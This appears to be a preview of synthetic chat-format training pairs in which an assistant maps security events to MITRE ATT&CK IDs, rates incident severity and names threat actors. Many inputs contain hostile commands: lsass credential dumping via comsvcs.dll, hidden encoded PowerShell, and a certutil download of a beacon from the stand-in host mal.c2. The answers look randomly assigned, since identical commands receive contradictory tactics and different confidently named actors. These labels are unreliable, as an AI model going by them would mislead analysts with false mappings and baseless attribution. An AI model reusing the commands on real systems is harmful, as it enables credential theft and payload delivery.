messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-7ZFTQJ99TU)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2573 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.33.67.244", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.182.203.96", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role":...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for processes being accessed that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon key...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SysUpdate can use packed binaries.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 796 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.7.139.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0004\", \"TA0008\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-QCGHF0Z3TZ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Collection, Defense Evasion", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-P2IETX1SJ7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-NJEBMB93HY)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Persistence", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.181.133.11", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3855 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.83.84.186", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1098.004...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macro...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.136.101.183", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0005\"], \"techn...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3663 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.85.17.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0011\"], \"techniques\": ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SoreFang can collect usernames from the local system via net.exe user.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087\", \"T1087.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Naid collects the domain name from a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-FM1HFD5MLZ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Cri...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-KW4APTJAO6)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Privilege Escalation, Persistence", "role": ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.60.220.152", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0001\", \"TA0008\"], \"techniques\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: BloodHound can collect password policy information on the target environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.131.245.72", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may abuse msiexec.exe to launch local or network accessible MSI files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.007\"]}", "role": "...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.189.163.131", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA00...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: TYPEFRAME can delete files off the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.97.189.235", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techni...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3594 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.136.35.10", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.83.185.144", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA000...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: objectClass=trustedDomain", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-TAUVXIGMH0)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Execution", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1136\", \"T1136.003\", \"T1...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2738 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.7.65.5", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-NSTTHEM4IC)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Lateral Movement", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-4CC02Y9K0W)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Execution, Persistence", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-C2O5JFRBI3)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Discovery, Impact", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2771 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2946 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-GTUGFKBNDC)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.183.209.40", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0004\"], \"techniqu...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may delete files left behind by the actions of their intrusion activity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2350 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.107.158.186", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0006\"], \"techniques\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.189.175.236", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0011\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-1UHACSH0WZ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence, Defense Evasion", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spide...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3192 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.114.106.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2012 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.50.133.74", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.156.136.118", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1911 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.29.36.184", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0004\"], \"techniques\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", "role": "user" }, { "content": "{\"ta...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.1.22.179", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0005\", \"TA0004\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-STROXWTRZE)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Initial Access, Discovery", "role": "user" }, { "content": "{\"se...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.86.176.195", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA001...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: After writing to this file, the Trojan will enter a loop to continually to check for changes to the modification time of this file, effectively waiting for the actor to make modifications to the file", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-P1SWY56UKM)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Collection", "role": "user" }, { "content": "{\"seve...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may use bootkits to persist on systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"T1542.003\", \"T1542\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-F00KKJZC7B)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Privilege Escalation, Lateral Movement", "role": "user" },...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.159.114.104", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-SCIYS9XP1A)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-NN9FEE7AP1)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T100...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-759W8BRW02)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1789 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3895 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.48.170.202", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0001...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.126.159.87", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2048 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.157.208.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"T...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-OR7F4LAHXM)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Discovery, Execution", "role": "user" }, { "conten...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: build_downer has the ability to send system volume information to C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2582 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.106.38.232", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0040\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3407 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.167.147.57", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3159 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.162.201.113", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0009\", \"TA0010\"], \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1661 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-XQ6XIDSBE7)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Execution", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-1GRI3EIIL9)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Execution", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2276 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests.", "role": "user" }, { "conte...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.009\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2185 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"conf...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PinchDuke collects user files from the compromised host based on predefined file extensions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-VQUDJYIJE1)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1102.001\", \"T1102\"]}", "role...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-9O53DW1GJ2)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Exfiltration, Command and Control", "role": "user" }, ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.146.57.223", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: GCMAN uses VNC for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.005\", \"T1021\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Agent.btz collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.", "role...